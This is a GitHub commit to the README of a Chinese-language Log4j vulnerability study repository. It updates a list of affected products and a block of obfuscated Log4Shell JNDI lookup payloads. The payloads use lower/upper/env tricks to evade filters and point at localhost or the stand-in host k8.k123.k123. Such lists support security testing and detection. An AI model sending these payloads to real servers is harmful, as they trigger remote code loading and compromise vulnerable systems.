Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

Commit 9ac193e

Browse files
committed
Update README.md
1 parent 4a5283f commit 9ac193e

File tree

1 file changed

+26
-12
lines changed

1 file changed

+26
-12
lines changed

‎README.md‎

Lines changed: 26 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# HackLog4j-永恒之恶龙
22

3-
本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月19日。作者:[0e0w](https://github.com/0e0w/HackLog4j)
3+
本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月20日。作者:[0e0w](https://github.com/0e0w/HackLog4j)
44

55
- [01-Log4j基础知识](https://github.com/0e0w/HackLog4j#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86)
66
- [02-Log4j框架识别](https://github.com/0e0w/HackLog4j#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB)
@@ -24,18 +24,21 @@
2424

2525
- [ ] Apache Flink
2626
- [ ] Apache Struts2
27+
- [ ] Apache Spark
28+
- [ ] Apache Tomcat
2729
- [x] Apache Solr
30+
- [ ] Apache Dubbo
31+
- [ ] Apache Druid
2832
- [ ] flume
29-
- [ ] dubbo
30-
- [ ] Druid
3133
- [ ] Redis
3234
- [ ] logstash
3335
- [ ] ElasticSearch
3436
- [ ] kafka
3537
- [ ] ghidra
3638
- [ ] Spring-Boot-strater-log4j2
3739
- [ ] VMware vCenter
38-
- [ ] 我的世界(Minecraft)
40+
- [ ] Minecraft
41+
- [ ] Logstash
3942
- ......
4043
- https://github.com/cisagov/log4j-affected-db
4144
- https://github.com/YfryTchsGD/Log4jAttackSurface
@@ -67,25 +70,36 @@ ${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
6770
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
6871
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
6972
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
70-
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
71-
${${::-j}ndi:rmi://127.0.0.1/poc}
72-
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
73-
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
74-
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
75-
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
7673
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
7774
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
7875
$%7Bjndi:ldap://127.0.0.1/poc%7D
7976
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
8077
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
8178
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
8279
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
83-
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
8480
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
8581
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
86-
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
8782
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
83+
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
84+
${${::-j}ndi:rmi://k123.k123.k123/ass}
85+
${jndi:rmi://k8.k123.k123}
86+
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
87+
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
88+
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
8889
j${loWer:Nd}i${uPper::}
90+
${jndi:ldaps://127.0.0.1/poc}
91+
${jndi:iiop://127.0.0.1/poc}
92+
${date:ldap://127.0.0.1/poc}
93+
${java:ldap://127.0.0.1/poc}
94+
${marker:ldap://127.0.0.1/poc}
95+
${ctx:ldap://127.0.0.1/poc}
96+
${lower:ldap://127.0.0.1/poc}
97+
${upper:ldap://127.0.0.1/poc}
98+
${main:ldap://127.0.0.1/poc}
99+
${jvmrunargs:ldap://127.0.0.1/poc}
100+
${sys:ldap://127.0.0.1/poc}
101+
${env:ldap://127.0.0.1/poc}
102+
${log4j:ldap://127.0.0.1/poc}
89103
```
90104

91105
- https://github.com/fullhunt/log4j-scan

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /